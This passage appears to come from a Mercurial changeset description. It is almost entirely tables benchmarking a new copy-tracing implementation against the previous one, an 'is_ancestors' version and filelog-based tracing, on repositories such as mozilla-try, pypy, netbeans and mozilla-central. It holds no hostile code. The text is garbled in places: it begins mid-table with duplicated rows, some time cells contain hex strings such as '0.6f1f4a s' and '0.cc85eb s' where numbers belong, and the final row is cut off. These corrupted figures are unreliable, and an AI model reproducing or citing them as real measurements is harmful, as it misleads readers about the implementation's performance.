95d83ee7242d : 362229 revs, 4.457827 s, 3.981133 s, -0.476694 s, × 0.8931, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.351696 s, 3.996647 s, -0.355049 s, × 0.9184, 11 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 80.828689 s, 50.244975 s, -30.583714 s, × 0.6216, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 34.094064 s, 20.030023 s, -14.064041 s, × 0.5875, 52 µs/rev private : 459513 revs, 27.435529 s, 24.490825 s, -2.944704 s, × 0.8927, 53 µs/rev We also got significantly faster than the implementation using is_ancestors except for one of our reference case: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.011322 s, -1.126847 s, × 0.7807, 11 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 3.981133 s, -1.146676 s, × 0.7764, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 3.996647 s, -0.974489 s, × 0.8040, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.520607 s, -0.221071 s, × 0.8731, 7 µs/rev private : 459513 revs, 37.179470 s, 24.490825 s, -12.688645 s, × 0.6587, 53 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 50.244975 s, +9.930153 s, × 1.2463, 219 µs/rev Below are three different benchmark comparing this changeset to: * the previous one, * the implementation based on `is_anscestors`, * the filelog copy tracing. ### Compared to the previous ones Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000041 s, -0.000002 s, × 0.9535, 41 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000116 s, +0.000002 s, × 1.0175, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004899 s, 0.004933 s, +0.000034 s, × 1.0069, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000196 s, 0.000193 s, -0.000003 s, × 0.9847, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000048 s, -0.000001 s, × 0.9796, 48 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000117 s, 0.000114 s, -0.000003 s, × 0.9744, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.6f1f4a s, 0.000319 s, -0.000003 s, × 0.9907, 319 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011856 s, 0.012025 s, +0.000169 s, × 1.0143, 2004 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.050992 s, 0.050525 s, -0.000467 s, × 0.9908, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087444 s, 0.085713 s, -0.001731 s, × 0.9802, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.062487 s, 0.061825 s, -0.000662 s, × 0.9894, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.634909 s, 0.543998 s, -0.090911 s, × 0.8568, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013360 s, 0.013455 s, +0.000095 s, × 1.0071, 6727 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.120775 s, 0.117479 s, -0.003296 s, × 0.9727, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000084 s, -0.000001 s, × 0.9882, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000108 s, 0.000111 s, +0.000003 s, × 1.0278, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000176 s, 0.000175 s, -0.000001 s, × 0.9943, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000747 s, 0.000732 s, -0.000015 s, × 0.9799, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010128 s, 0.010062 s, -0.000066 s, × 0.9935, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015899 s, 0.015659 s, -0.000240 s, × 0.9849, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.062215 s, 0.062744 s, +0.000529 s, × 1.0085, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.521004 s, 0.499449 s, -0.021555 s, × 0.9586, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000090 s, 0.000088 s, -0.000002 s, × 0.9778, 44 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000264 s, 0.000266 s, +0.000002 s, × 1.0076, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000186 s, 0.000182 s, -0.000004 s, × 0.9785, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000660 s, 0.000656 s, -0.000004 s, × 0.9939, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003542 s, 0.003389 s, -0.000153 s, × 0.9568, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.071574 s, 0.075882 s, +0.004308 s, × 1.0602, 12647 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006498 s, 0.006479 s, -0.000019 s, × 0.9971, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005206 s, 0.004889 s, -0.000317 s, × 0.9391, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065535 s, 0.064394 s, -0.001141 s, × 0.9826, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027139 s, 0.026815 s, -0.000324 s, × 0.9881, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.201924 s, 0.cc85eb s, +0.000940 s, × 1.0047, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.257201 s, 1.219445 s, -0.037756 s, × 0.9700, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.663045 s, 1.613857 s, -0.049188 s, × 0.9704, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000866 s, 0.000873 s, +0.000007 s, × 1.0081, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000883 s, 0.000885 s, +0.000002 s, × 1.0023, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000163 s, 0.000161 s, -0.000002 s, × 0.9877, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001139 s, 0.001138 s, -0.000001 s, × 0.9991, 569 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.032753 s, 0.033399 s, +0.000646 s, × 1.0197, 33399 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073266 s, 0.075445 s, +0.002179 s, × 1.0297, 12574 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006567 s, 0.006456 s, -0.000111 s, × 0.9831, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005427 s, 0.005462 s, +0.000035 s, × 1.0064, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064058 s, 0.064117 s, +0.000059 s, × 1.0009, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.303320 s, 0.297563 s, -0.005757 s, × 0.9810, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.288456 s, 0.282463 s, -0.005993 s, × 0.9792, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.085925 s, 0.084038 s, -0.001887 s, × 0.9780, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027302 s, 0.027306 s, +0.000004 s, × 1.0001, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.034596 s, 1.465264 s, -0.569332 s, × 0.7202, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.694030 s, 0.690376 s, -0.003654 s, × 0.9947, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.407723 s, 4.011322 s, -0.396401 s, × 0.9101, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574355 s, 0.573541 s, -0.000814 s, × 0.9986, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.457827 s, 3.981133 s, -0.476694 s, × 0.8931, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.351696 s, 3.996647 s, -0.355049 s, × 0.9184, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.570065 s, 1.520607 s, -0.049458 s, × 0.9685, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 80.828689 s, 50.244975 s, -30.583714 s, × 0.6216, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 34.094064 s, 20.030023 s, -14.064041 s, × 0.5875, 52 µs/rev private : 459513 revs, 27.435529 s, 24.490825 s, -2.944704 s, × 0.8927, 53 µs/rev ### Compared to the implementation using `is_anscestor` Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000042 s, 0.000041 s, -0.000001 s, × 0.9762, 41 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000110 s, 0.000116 s, +0.000006 s, × 1.0545, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004945 s, 0.004933 s, -0.000012 s, × 0.9976, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000192 s, 0.000193 s, +0.000001 s, × 1.0052, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000048 s, -0.000001 s, × 0.9796, 48 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000112 s, 0.000114 s, +0.000002 s, × 1.0179, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000323 s, 0.000319 s, -0.000004 s, × 0.9876, 319 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.010042 s, 0.012025 s, +0.001983 s, × 1.1975, 2004 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.049813 s, 0.050525 s, +0.000712 s, × 1.0143, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.079937 s, 0.085713 s, +0.005776 s, × 1.0723, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.059412 s, 0.061825 s, +0.002413 s, × 1.0406, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.533769 s, 0.543998 s, +0.010229 s, × 1.0192, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013147 s, 0.013455 s, +0.000308 s, × 1.0234, 6727 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.110680 s, 0.117479 s, +0.006799 s, × 1.0614, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000084 s, -0.000001 s, × 0.9882, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000111 s, +0.000004 s, × 1.0374, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000175 s, 0.000175 s, +0.000000 s, × 1.0000, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000720 s, 0.000732 s, +0.000012 s, × 1.0167, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010019 s, 0.010062 s, +0.000043 s, × 1.0043, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015602 s, 0.015659 s, +0.000057 s, × 1.0037, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.058759 s, 0.062744 s, +0.003985 s, × 1.0678, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.491550 s, 0.499449 s, +0.007899 s, × 1.0161, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000087 s, 0.000088 s, +0.000001 s, × 1.0115, 44 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000268 s, 0.000266 s, -0.000002 s, × 0.9925, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000181 s, 0.000182 s, +0.000001 s, × 1.0055, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000661 s, 0.000656 s, -0.000005 s, × 0.9924, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003256 s, 0.003389 s, +0.000133 s, × 1.0408, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.066749 s, 0.075882 s, +0.009133 s, × 1.1368, 12647 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006462 s, 0.006479 s, +0.000017 s, × 1.0026, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.004919 s, 0.004889 s, -0.000030 s, × 0.9939, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.062421 s, 0.064394 s, +0.001973 s, × 1.0316, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026633 s, 0.026815 s, +0.000182 s, × 1.0068, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.197792 s, 0.cc85eb s, +0.005072 s, × 1.0256, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.259970 s, 1.219445 s, -0.040525 s, × 0.9678, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.689184 s, 1.613857 s, -0.075327 s, × 0.9554, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000865 s, 0.000873 s, +0.000008 s, × 1.0092, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000893 s, 0.000885 s, -0.000008 s, × 0.9910, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000172 s, 0.000161 s, -0.000011 s, × 0.9360, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.001159 s, 0.001138 s, -0.000021 s, × 0.9819, 569 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.031621 s, 0.033399 s, +0.001778 s, × 1.0562, 33399 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.068571 s, 0.075445 s, +0.006874 s, × 1.1002, 12574 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006452 s, 0.006456 s, +0.000004 s, × 1.0006, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005443 s, 0.005462 s, +0.000019 s, × 1.0035, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.063180 s, 0.064117 s, +0.000937 s, × 1.0148, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.293564 s, 0.297563 s, +0.003999 s, × 1.0136, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.286595 s, 0.282463 s, -0.004132 s, × 0.9856, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.083256 s, 0.084038 s, +0.000782 s, × 1.0094, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027282 s, 0.027306 s, +0.000024 s, × 1.0009, 44 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 1.465264 s, +0.121891 s, × 1.0907, 15 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.665737 s, 0.690376 s, +0.024639 s, × 1.0370, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.011322 s, -1.126847 s, × 0.7807, 11 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.573276 s, 0.573541 s, +0.000265 s, × 1.0005, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 3.981133 s, -1.146676 s, × 0.7764, 10 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 3.996647 s, -0.974489 s, × 0.8040, 11 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.520607 s, -0.221071 s, × 0.8731, 7 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 50.244975 s, +9.930153 s, × 1.2463, 219 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 20.030023 s, -0.018006 s, × 0.9991, 52 µs/rev private : 459513 revs, 37.179470 s, 24.490825 s, -12.688645 s, × 0.6587, 53 µs/rev ### Compared to the filelog based copy tracing Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000918 s, 0.000041 s, -0.000877 s, × 0.044662, 40 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.001853 s, 0.000116 s, -0.001737 s, × 0.062601, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.018994 s, 0.004933 s, -0.014061 s, × 0.259714, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.001532 s, 0.000193 s, -0.001339 s, × 0.125979, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.210633 s, 0.000048 s, -0.210585 s, × 0.000228, 47 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.017041 s, 0.000114 s, -0.016927 s, × 0.006690, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.019474 s, 0.000319 s, -0.019155 s, × 0.016381, 318 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.763136 s, 0.012025 s, -0.751111 s, × 0.015757, 2003 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 1.226569 s, 0.050525 s, -1.176044 s, × 0.041192, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 1.314572 s, 0.085713 s, -1.228859 s, × 0.065202, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 1.686022 s, 0.061825 s, -1.624197 s, × 0.036669, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.001110 s, 0.543998 s, +0.542888 s, × 490.0882, 12 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 1.106265 s, 0.013455 s, -1.092810 s, × 0.012163, 6724 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 1.377398 s, 0.117479 s, -1.259919 s, × 0.085291, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.028579 s, 0.000084 s, -0.028495 s, × 0.002939, 41 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.133644 s, 0.000111 s, -0.133533 s, × 0.000831, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.025988 s, 0.000175 s, -0.025813 s, × 0.006734, 58 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.053011 s, 0.000732 s, -0.052279 s, × 0.013808, 81 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.037858 s, 0.010062 s, -0.027796 s, × 0.265783, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.200517 s, 0.015659 s, -0.184858 s, × 0.078093, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.964542 s, 0.062744 s, -0.901798 s, × 0.065051, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 3.976210 s, 0.499449 s, -3.476761 s, × 0.125609, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.025172 s, 0.000088 s, -0.025084 s, × 0.003496, 43 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.145144 s, 0.000266 s, -0.144878 s, × 0.001833, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.026139 s, 0.000182 s, -0.025957 s, × 0.006963, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.086184 s, 0.000656 s, -0.085528 s, × 0.007612, 93 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.203187 s, 0.003389 s, -0.199798 s, × 0.016679, 1129 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 2.255675 s, 0.075882 s, -2.179793 s, × 0.033640, 12644 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.091147 s, 0.006479 s, -0.084668 s, × 0.071083, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.767530 s, 0.004889 s, -0.762641 s, × 0.006370, 119 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 1.185330 s, 0.064394 s, -1.120936 s, × 0.054326, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 6.831179 s, 0.026815 s, -6.804364 s, × 0.003925, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 3.373551 s, 0.cc85eb s, -3.170687 s, × 0.060134, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 16.540604 s, 1.219445 s, -15.321159 s, × 0.073724, 7 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 21.527155 s, 1.613857 s, -19.913298 s, × 0.074968, 7 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.084540 s, 0.000873 s, -0.083667 s, × 0.010326, 436 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.507151 s, 0.000885 s, -0.506266 s, × 0.001745, 442 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.021748 s, 0.000161 s, -0.021587 s, × 0.007403, 40 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.236786 s, 0.001138 s, -0.235648 s, × 0.004806, 568 µs/rev mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 1.111735 s, 0.033399 s, -1.078336 s, × 0.030042, 33365 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 2.228030 s, 0.075445 s, -2.152585 s, × 0.033862, 12572 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.091289 s, 0.006456 s, -0.084833 s, × 0.070720, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.771361 s, 0.005462 s, -0.765899 s, × 0.007081, 133 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 1.189483 s, 0.064117 s, -1.125366 s, × 0.053903, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.089756 s, 0.297563 s, +0.207807 s, × 3.315244, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.084888 s, 0.282463 s, +0.197575 s, × 3.327479, 7 